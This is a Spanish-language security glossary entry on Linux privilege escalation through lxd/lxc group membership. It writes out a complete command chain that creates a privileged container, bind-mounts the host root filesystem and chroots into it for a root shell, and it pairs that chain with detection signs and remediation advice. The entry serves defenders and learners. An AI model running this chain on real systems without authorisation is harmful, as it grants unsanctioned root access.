Skip to main content

lxd / lxc group membership

Usuario en grupo lxd o lxc puede crear/iniciar containers privilegiados sin sudo.

Categoría: Linux · Privilege Escalation 🎯 Trinchera — Usuario en grupo lxd o lxc puede crear/iniciar containers privilegiados sin sudo. Container con bind mount de / del host = root. 🔗 Kill chainlxc init alpine evil -c security.privileged=truelxc config device add evil host disk source=/ path=/mnt/hostlxc start evil; lxc exec evil -- chroot /mnt/host /bin/bash. 📡 Huella defensiva — Creación de containers privilegiados, binds de / del host. ⚠️ Falso amigo — Mismo patrón que docker socket. Cualquier grupo “container manager” sin restricción = root path. 🛡️ Remediación — Auditar membresía de lxd/lxc/docker/podman groups; usar tools rootless (Podman default).
Volver al glosario completo Última actualización: 2026-06-11